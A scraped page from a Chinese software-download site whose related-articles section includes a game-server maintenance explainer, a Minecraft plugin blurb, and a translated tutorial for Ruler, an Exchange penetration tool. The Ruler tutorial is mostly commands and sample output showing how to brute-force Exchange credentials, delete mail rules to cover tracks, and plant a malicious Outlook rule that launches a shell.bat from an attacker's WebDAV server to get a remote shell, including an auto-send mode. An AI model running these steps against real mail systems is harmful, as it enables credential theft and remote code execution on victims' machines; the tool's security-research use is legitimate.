首页
Windows
AI应用
音乐
视频
图片
系统
编程
游戏
安全
网络
维护
优化
刻录解压
浏览器
组件
效率
Android
应用推荐
游戏推荐
电视应用
Tool kit
HTML源码
编程开放
安全软件
远程控制
分析/安全
自学教程
linux软件
Fusion app源码
PHP源码
艺术
每日一知
我的世界
手机游戏
电脑游戏
网站推荐
桌面壁纸
头像
✨探索
个人资料
发表帖子
退出登录
剑客网
快手上很骚的小学生上电视了!
2017年7月17日
0条评论
快手上很骚的小学生上电视了!
内容
相关
作者信息
江湖剑客
3578篇文章
730条评论
TA主页
联系Ta
描述:
一起用互联网帮助更多人
本文标签:
本文链接:快手上很骚的小学生上电视了! - http://www.go176.net/post-2160.html
相关文章
@林路翔,全职程序员,喜欢围棋 来,我作为前网易游戏从业人员来说说真正服务器维护时候在做什么。 服务器维护分成两种,紧急维护和日常维护。 紧急维护一般就是硬件故障或者严重 Bug。这个时候是各个团队最紧张的时候。每个团队都忙个不停。 运营团队会发布公告,安慰玩家,统计损失,编写故障报告,评定故障等级等等 策划团队可能会考虑 Bug 的影响程度,决定要不要回档,或者赔偿什么,赔偿会不会影响经济系统等等。 程序团队最重要的是缩小 Bug 的影响,比如热更新屏蔽玩法,然后解决 Bug。有时候硬件故障会导致整个服务器某些结点负载不均衡,或者万一数据库服务器挂了就得赶紧切数据库。 QC 团队会继续测试一下,包括改好的版本,QC 老大一般有一票否决权决定某个版本是不是放 SA 团队会有人值班紧跟,如果硬件问题就联系 IT 去换啊之类的。 日常维护就流程化多了 运营团队会提前放出更新内容,做好新玩法预热 策划会最后在内服上跑一跑玩法看看有没有问题,然后等着正式开服以后去论坛看玩家反应 程序一般就是更新代码,部署到服务器内部测试,如果架构有改动,就和 SA 配合一起跑脚本改架构。同时,另一拨人会跑一堆脚本,包括和计费的对账脚本,导数据的脚本,更新各种榜单的脚本,预热数据库和 cache 的脚本等等。每个人也会对自己的模块再测试一遍,然后会盯着各种警报 QC 团队也会在服务器上面把本周新玩法和主流程再测试一遍。 其他支持团队就是日常配合工作。 另外看到很多答案都说重启服务器,其实我想说,我们真的很少重启服务器的。每次重启代价都很大。除非硬件更新或者特殊情况是不会重启服务器的。 其实一般意义上讲服务器重启可以理解为两种,一种是硬件重启,一种是服务器进程重启。硬件重启比较少,服务器进程重启基本上是必须的。 很多人问为什么硬件重启代价很大。感觉大家的回答。我直接把评论补充上来。 @曦和风 如果是自动启动的程序的话没有问题,但是服务器很多系统配置和软件设置都要开机后重新折腾,同时,还要和其他的服务器通信,恢复到启动前的状态,或者从其他服务器同步信息,正确处理关机期间的各种操作,事情多,任务重,出错概率大,都不愿意重启吧。 还有人提问为什么维护了这么长时间。我想说,请去客服专区或者论坛发帖,会有一大波运营人员过来安抚你的。 还有人抱怨一个礼拜维护两次这种。我想说 EVE 这种神作是每天早上维护一次呢。维护也是为了大家能更好地游戏啊。(吐槽一下谁让 EVE 用的是 Windows 服务器呢。)
网络游戏的服务器维护都是在做些什么?
江湖剑客
2017-1-23
这个插件可以自定义生物的血量、名字和最大血量~ 始终显示任何生物的血量(0延迟) 不需要安装任何前置MOD~ 在后台可以看到插件的信息~ 你可以改变玩家以及生物的血量~ 对于玩家: player.setMaxHealth(...); player.setHealth(...); 对于生物: mob.setMaxHealth(...); mob.setHealth(...); 原文地址 适用版本:1.7.2-1.11.X 下载地址: 剑客下载
我的世界HealthBar——血量条插件
江湖剑客
2017-9-5
Silentbreak对该攻击行为的研究非常到位,给我们带来了极大的便利。唯一的缺点是它的安装时间过长。复制邮箱到一个新的Outlook实例比较耗时。创建邮件规则也相对麻烦。那么有人可能会问,难道就没有更好的payload生成器么?因此Ruler就这样诞生了。 Ruler的实现方式和MAPI的相关资料请参见博客:SensePostblog 运行demo的链接地址:Ruler onYouTube 它能做什么? Ruler包含多种已经实现的和正在研发或计划研发的功能,包括: 枚举有效用户 查看当前配置邮件规则 创建新的恶意邮件规则 删除邮件规则 当与Exchange交互并使用自动发现服务(与Outlook客户端一样)发现相关信息时,Ruler会处于半智能状态。 获取代码 Ruler是用Go语言编写的,因此你需要有GO语言环境来运行并创建相关项目。第一步是克隆它的仓库。 git clone https://github.com/sensepost/ruler.git 或者你可以直接通过Go命令获取。 go get github.com/sensepost/ruler 如果你想运行这个APP的话请使用 go run go run ruler.go –h 或直接创建一个(首选): go build 与Exchange交互 它目前与用于OutlookAnywhere的新版 MAPI/HTTP 协议兼容,且可能与被 MAPI 取代的旧版 RPC/HTTP 协议存在不兼容的情况。 凭证的暴力破解 如果你走暴力破解的路线,那么Ruler绝对是你的菜。它有一个内置的暴力破解工具,能够做寻找凭证这项半智能的工作。 ./ruler -domain targetdomain.com -brute -usernames/path/to/user.txt -passwords /path/to/passwords.txt 你应该看得到你正在运行的暴力破解过程: ./ruler -domain evilcorp.ninja -brute -usernames~/users.txt -passwords ~/passwords.txt -delay 0 -v -insecure [*] Starting bruteforce [x] Failed: cindy.baker:P@ssw0rd [x] Failed: henry.hammond:P@ssw0rd [x] Failed: john.ford:P@ssw0rd [x] Failed: cindy.baker:August2016 [x] Failed: henry.hammond:August2016 [+] Success: john.ford:August2016 [*] Multiple attempts. To prevent lockout - delaying for0 minutes. [x] Failed: cindy.baker:Evilcorp@2016 [x] Failed: henry.hammond:Evilcorp@2016 [x] Failed: cindy.baker:3V1lc0rp [x] Failed: henry.hammond:3V1lc0rp [*] Multiple attempts. To prevent lockout - delaying for0 minutes. [x] Failed: henry.hammond:Password1 [+] Success: cindy.baker:Password1 [x] Failed: henry.hammond:Password!2016 [*] Multiple attempts. To prevent lockout - delaying for0 minutes. [x] Failed: henry.hammond:SensePost1 [x] Failed: henry.hammond:Lekker [*] Multiple attempts. To prevent lockout - delaying for0 minutes. [x] Failed: henry.hammond:Eish 或者,你可以使用-userpass选项指定用户传递文件。 用户传递文件应以冒号分隔,每行一对凭证: $ cat userpass.txt john.ford:August2016 henry.hammond:Password!2016 cindy.baker:Password1 ./ruler -domain evilcorp.ninja -brute -userpassuserpass.txt -v -insecure [*] Starting bruteforce [+] Success: john.ford:August2016 [x] Failed: henry.hammond:Password!2016 [+] Success: cindy.baker:Password1 还有其它的一些参数与-brute协同工作,包括: -stop //在第一个有效的用户名上停止:密码combo -delay //多次密码猜测之间的停留时间间隔 -attempts //在停留之前需要进行几次尝试(每个用户的尝试次数) -insecure //当Exchange服务器有一个坏的SSL证书时 -v //详细地显示失败的尝试 自动发现服务(The autodiscover service) 尽管Ruler在“自动发现”必要设置上作出了很大的努力,但你仍然可能会遇到失败的情况。一般原因有以下几点: 自动发现http/非https上的部署(我们默认https是更为普遍的情况) 无自动发现DNS记录 身份验证失败 若你碰到使自动发现服务崩溃的Exchange服务器,你可以手动设置自动发现的目标URL: ./ruler -url//autodiscover.somedomain.com/autodiscover/autodiscover.xml 若碰到身份验证问题(并且确定登录凭证正确无误),你可以尝试强制使用-basic进行基本身份验证。 -v flag同样能给你一些自动发现服务所使用进程的提示。 显示现有规则/账户验证 只要有一组凭证,你就可以以该用户的邮箱为目标,但我们需要知道该用户的邮箱地址(邮箱地址簿搜索功能已列入研发计划) ./ruler -domain targetdomain.com -emailuser@targetdomain.com -user username -pass password –display 输出: ./ruler -domain evilcorp.ninja -user john.ford -passAugust2016 -email john.ford@evilcorp.ninja -display -insecure [*] Retrieving MAPI info [*] Doing Autodiscover for domain [+] MAPI URL found: //mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja [+] User DN: /o=Evilcorp/ou=Exchange Administrative Group(FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford [*] Got Context, Doing ROPLogin [*] And we are authenticated [+] Mailbox GUID: [251 102 208 159 53 202 228 77 184 67 76 15 228 47 61 223] [*] Openning the Inbox [+] Retrieving Rules [+] Found 0 rules 删除现有规则(清理痕迹) 例如:通过模糊匹配000000df1(规则名称附近的ruleId)来删除相应规则 ./ruler -domain targetdomain.com -emailuser@targetdomain.com -user username -pass password -delete 000000df1 反弹shell 现在到最有意思的部分了。你的初始设置和Silentbreak博客所述的是一样的,设置您的控制端服务器来承载您的payload。 创建新的规则用户Ruler以及: ./ruler -domain targetdomain.com -emailuser@targetdomain.com -user username -pass password -loc"\\\\yourserver\\webdav\\shell.bat" -trigger "pop a shell"-rule maliciousrule 各个部分: -loc 表示远程shell的位置,连接远程shell时请注意使用双斜杠\(或者c:/Windows/system32/calc.exe) -trigger 表示主题中你想用来触发规则的命令 -rule 表示你所创建规则的名称 输出: [*] Retrieving MAPI info [*] Doing Autodiscover for domain [+] MAPI URL found: //mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja [+] User DN: /o=Evilcorp/ou=Exchange Administrative Group(FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford [*] Got Context, Doing ROPLogin [*] And we are authenticated [+] Mailbox GUID: [251 102 208 159 53 202 228 77 184 67 76 15 228 47 61 223] [*] Openning the Inbox [*] Adding Rule [*] Rule Added. Fetching list of rules... [+] Found 1 rules Rule: shell RuleID: 01000000127380b1 现在你可以发一封邮件给你的目标,并且将执行代码写在邮件的主题行中。从测试邮件规则开始都是同步发送的,因此在通常的情况下假设目标的outlook处于打开并联网的状态,你应该能够立即获取对方的shell。 半自动化攻击(Semi-Autopwn) 如果你想实现自动化地触发规则,Ruler能利用用户自己的邮箱在他们的收件箱中创建一个新邮件。也就是说你不再需要向你的攻击目标发送邮件,只要在创建规则时使用-send这个参数即可。你所创建的规则同步需要等待30秒(如果你觉得30秒太长或太短都可以在源码中作出调整),然后通过MAPI发送邮件。 [*] Retrieving MAPI/HTTP info [*] Doing Autodiscover for domain [*] Autodiscover step 0 - URL:https://outlook.com/autodiscover/autodiscover.xml [+] MAPI URL found: //outlook.office365.com/mapi/emsmdb/?MailboxId=0003bffd-fef9-fb24-0000-000000000000@outlook.com [+] User DN: /o=First Organization/ou=Exchange AdministrativeGroup(FYDIBOHF23SPDLT)/cn=Recipients/cn=0003BFFDFEF9FB24 [*] Got Context, Doing ROPLogin [*] And we are authenticated [+] Mailbox GUID: dc561d32a809304b8dbc91cc9f0ae1e2 [*] Openning the Inbox [*] Adding Rule [*] Rule Added. Fetching list of rules... [+] Found 1 rules Rule: autopop RuleID: 010000000c4baa84 [*] Auto Send enabled, wait 30 seconds before sendingemail (synchronisation) [*] Sending email [*] Message sent, your shell should trigger shortly. [*] And disconnecting from server
Ruler:一款利用Exchange服务渗透的安全工具
江湖剑客
2016-10-26
×
支付订单
